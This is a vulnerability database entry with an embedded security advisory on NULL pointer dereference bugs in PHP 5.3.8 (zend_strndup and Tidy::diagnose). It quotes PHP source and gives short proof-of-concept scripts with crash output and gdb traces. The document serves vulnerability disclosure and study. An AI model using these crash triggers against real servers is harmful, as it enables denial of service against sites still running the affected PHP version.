ZeroBox Vulnerability Database

php:5.3.8

CVE-2012-0781

PHP是一款免费开放源代码的WEB脚本语言包，可使用在Microsoft Windows、Linux和Unix操作系统下。

PHP 5.3.8版本中的tidy_diagnose函数中存在漏洞。远程攻击者可利用该漏洞借助对应用程序的特制输入，造成拒绝服务（空指针解引用进而应用程序崩溃），该应用程序试图在无效对象上执行Tidy::diagnose操作。

<* 参考

http://cxsecurity.com/research/103

*>

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. —–BEGIN PGP SIGNED MESSAGE—–
2. Hash: SHA1
3. [ PHP 5.3.8 Multiple vulnerabilities ]
4. Author: Maksymilian Arciemowicz
5. Website: http://cxsecurity.com/
6. Date: 14.01.2012
7. CVE:
8. CVE-2011-4153 (zend_strndup)
9. Original link:
10. http://cxsecurity.com/research/103
11. [— 1. Multiple NULL Pointer Dereference with zend_strndup()
12. [CVE-2011-4153] —]
13. As we can see in zend_strndup()
14. – -zend_alloca.c—
15. ZEND_API char *zend_strndup(const char *s, uint length)
16. {
17. char *p;
18. p = (char *) malloc(length+1);
19. if (UNEXPECTED(p == NULL)) {
20. return p; <=== RETURN NULL
21. }
22. if (length) {
23. memcpy(p, s, length);
24. }
25. p[length] = 0;
26. return p;
27. }
28. – -zend_alloca.c—
29. zend_strndup() may return NULL
30. in php code, many calls to zend_strndup() dosen’t checks returned
31. values. In result, places like:
32. – -zend_builtin_functions.c—
33. ZEND_FUNCTION(define)
34. {
35. char *name;
36. int name_len;
37. zval *val;
38. zval *val_free = NULL;
39. zend_bool non_cs = 0;
40. int case_sensitive = CONST_CS;
41. zend_constant c;
42. if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, “sz|b”, &name,
43. &name_len, &val, &non_cs) == FAILURE) {
44. return;
45. }
46. …
47. c.flags = case_sensitive; /* non persistent */
48. c.name = zend_strndup(name, name_len); <======== MAY RETURN NULL
49. c.name_len = name_len+1;
50. c.module_number = PHP_USER_CONSTANT;
51. if (zend_register_constant(&c TSRMLS_CC) == SUCCESS) {
52. RETURN_TRUE;
53. } else {
54. RETURN_FALSE;
55. }
56. }
57. – -zend_builtin_functions.c—
58. – -PoC code—
59. [cx@82 /www]$ ulimit -a
60. socket buffer size (bytes, -b) unlimited
61. core file size (blocks, -c) unlimited
62. data seg size (kbytes, -d) 524288
63. file size (blocks, -f) unlimited
64. max locked memory (kbytes, -l) unlimited
65. max memory size (kbytes, -m) 40000
66. open files (-n) 11095
67. pipe size (512 bytes, -p) 1
68. stack size (kbytes, -s) 65536
69. cpu time (seconds, -t) unlimited
70. max user processes (-u) 5547
71. virtual memory (kbytes, -v) 40000
72. swap size (kbytes, -w) unlimited
73. [cx@82 /www]$ cat define.php
74. <?php
75. define(str_repeat(“A”,$argv[1]),”a”);
76. ?>
77. – -PoC code—
78. to see difference
79. [cx@82 /www]$ php define.php 8999999
80. Out of memory
81. [cx@82 /www]$ php define.php 9999999
82. Segmentation fault: 11
83. (gdb) bt
84. #0 0x28745eb0 in strrchr () from /lib/libc.so.7
85. #1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
86. at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
87. #2 0x08251e0e in zif_define (ht=2, return_value=0x28825a98,
88. return_value_ptr=0x0, this_ptr=0x0, return_value_used=0)
89. at /usr/ports/lang/php5/work/php/Zend/zend_builtin_functions.c:688
90. #3 0x0826dba6 in zend_do_fcall_common_helper_SPEC
91. (execute_data=0x29401040)
92. at zend_vm_execute.h:316
93. There are others places, where zend_strndup() is used:
94. – -1–
95. ext/soap/php_sdl.c
96. if (sdl->is_persistent) {
97. new_enc->details.ns = zend_strndup(ns, ns_len);
98. new_enc->details.type_str = strdup(new_enc->details.type_str);
99. } else {
100. new_enc->details.ns = estrndup(ns, ns_len);
101. new_enc->details.type_str = estrdup(new_enc->details.type_str);
102. }
103. – -1–
104. – -2–
105. ext/standard/syslog.c
106. BG(syslog_device) = zend_strndup(ident, ident_len);
107. openlog(BG(syslog_device), option, facility);
108. RETURN_TRUE;
109. – -2–
110. – -3–
111. ext/standard/browscap.c
112. } else { /* Other than true/false setting */
113. Z_STRVAL_P(new_property) = zend_strndup(Z_STRVAL_P(arg2),
114. Z_STRLEN_P(arg2));
115. Z_STRLEN_P(new_property) = Z_STRLEN_P(arg2);
116. }
117. new_key = zend_strndup(Z_STRVAL_P(arg1), Z_STRLEN_P(arg1));
118. zend_str_tolower(new_key, Z_STRLEN_P(arg1));
119. zend_hash_update(Z_ARRVAL_P(current_section), new_key,
120. Z_STRLEN_P(arg1) + 1, &new_property, sizeof(zval *), NULL);
121. free(new_key);
122. – -3–
123. – -4–
124. ext/oci8/oci8.c
125. if (alloc_non_persistent) {
126. connection = (php_oci_connection *) ecalloc(1,
127. sizeof(php_oci_connection));
128. connection->hash_key = estrndup(hashed_details.c, hashed_details.len);
129. connection->is_persistent = 0;
130. } else {
131. connection = (php_oci_connection *) calloc(1,
132. sizeof(php_oci_connection));
133. connection->hash_key = zend_strndup(hashed_details.c,
134. hashed_details.len);
135. connection->is_persistent = 1;
136. }
137. – -4–
138. – -5–
139. ext/com_dotnet/com_typeinfo.c
140. const_name = php_com_olestring_to_string(bstr_ids, &c.name_len,
141. codepage TSRMLS_CC);
142. c.name = zend_strndup(const_name, c.name_len);
143. efree(const_name);
144. c.name_len++; /* include NUL */
145. SysFreeString(bstr_ids);
146. /* sanity check for the case where the constant is already defined */
147. if (zend_get_constant(c.name, c.name_len – 1, &exists TSRMLS_CC)) {
148. if (COMG(autoreg_verbose) && !compare_function(&results,
149. &c.value, &exists TSRMLS_CC)) {
150. php_error_docref(NULL TSRMLS_CC, E_WARNING, “Type library
151. constant %s is already defined”, c.name);
152. }
153. free(c.name);
154. ITypeInfo_ReleaseVarDesc(TypeInfo, pVarDesc);
155. continue;
156. }
157. – -5–
158. – -6–
159. main/php_open_temporary_file.c
160. /* On Unix use the (usual) TMPDIR environment variable. */
161. {
162. char* s = getenv(“TMPDIR”);
163. if (s && *s) {
164. int len = strlen(s);
165. if (s[len – 1] == DEFAULT_SLASH) {
166. temporary_directory = zend_strndup(s, len – 1);
167. } else {
168. temporary_directory = zend_strndup(s, len);
169. }
170. return temporary_directory;
171. }
172. – -6–
173. [— 2. Tidy::diagnose() NULL pointer dereference —]
174. Class tidy, may provide to null pointer dereference using tidy lib.
175. 1287 static PHP_FUNCTION(tidy_diagnose)
176. 1288 {
177. 1289 TIDY_FETCH_OBJECT;
178. 1290
179. 1291 if (tidyRunDiagnostics(obj->ptdoc->doc) >= 0) {
180. 1292 tidy_doc_update_properties(obj TSRMLS_CC);
181. 1293 RETURN_TRUE;
182. 1294 }
183. 1295
184. 1296 RETURN_FALSE;
185. 1297 }
186. – -PoC—
187. (gdb) r -r ‘$nx=new Tidy(“*”);$nx->diagnose();’
188. The program being debugged has been started already.
189. Start it from the beginning? (y or n) y
190. Starting program: /usr/bin/php -r ‘$nx=new Tidy(“*”);$nx->diagnose();’
191. [Thread debugging using libthread_db enabled]
192. PHP Warning: tidy::__construct(): Cannot Load ‘*’ into memory in
193. Command line code on line 1
194. Program received signal SIGSEGV, Segmentation fault.
195. 0x00007fffedfaff87 in prvTidyReportMarkupVersion ()
196. from /usr/lib/libtidy-0.99.so.0
197. – -PoC—
198. – -Result—
199. cx@cx64:~$ php -r ‘$nx=new Tidy(“*”);$nx->diagnose();’
200. PHP Warning: tidy::__construct(): Cannot Load ‘*’ into memory in
201. Command line code on line 1
202. Segmentation fault
203. – -Result—
204. I do not consider this vulnerability as a having security impact other
205. as DoS.
206. [— 3. Contact —]
207. Author: Maksymilian Arciemowicz
208. Email: max {AA\TT cxsecurity |D|0|T] com
209. http://cxsecurity.com/
210. GPG:
211. http://cxsecurity.com/office.cxsecurity.txt
212. – —
213. Best Regards
214. Maksymilian Arciemowicz (CXSecurity.com)
215. pub 4096R/D6E5B530 2010-09-19
216. uid Maksymilian Arciemowicz (cx) <max@cxib.net>
217. sub 4096R/58BA663C 2010-09-19
218. —–BEGIN PGP SIGNATURE—–
219. iQIcBAEBAgAGBQJPEWEaAAoJEIO8+dzW5bUwiQIP+wW7gqAMB3FtONREDS9rUa83
220. VTJpMzCNdZw5cy7qIwivC4usdRUbidFy8Bqt/TA/3x8nWVm3Wx//5DPyFWb/RNZh
221. swSS7+9f6XJA4tEF/eTn6lCEG4xp2wLxHgxqIqmWR09gkOifhKHVEEXlO5qsQxhx
222. T5hEYqbvXEknzlUS/HC9C6sZsZK0EbdPjxDqe1qE+P3GyHecfoVb3s7WQw0IitZT
223. l47by1UbJ2iGj5q4EExLyj2FxomIw46LFdFtePHOI6EZcq/MODnyCGNkzVpS4tyK
224. SNIxiSp7nM1n08a6kQ1pZrMyTUO/LATojJ6qf79bJApyhK1ggs4WF+E73wItiFt0
225. ordQeqWy2hTLyv+UlbsoFErSgASgw5MIw3ygZXNZsdQWEMj+UCUTrsro7k/zB6Uy
226. 3r4ccmyf1Vd+kLx12SAR/uxHIlqQVskQDi2k45CPHQVAYGKdax24ksVlfgQ2K/dY
227. 2SCj9gEDAOKqtNLxyFyEStraeb330TrxbGaI25gjiDVf7nYgPowqdaM1gI862MoR
228. vP4vbFFY9ldwTBsLz9DNMVObsNWsoz2BlQ6olCgUPqkvce9RyI6rp+QwyIXQLcVr
229. jUGMXhpmDrNR2oyA4ufsZ4u5W8KUIK3t26v8649k3LSzmRpmK1TSTNqdHwm9WfMa
230. 0qg+Bq1hSEVfTOuqOY7x
231. =IDq3
232. —–END PGP SIGNATURE—–

目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://us.php.net/sites.php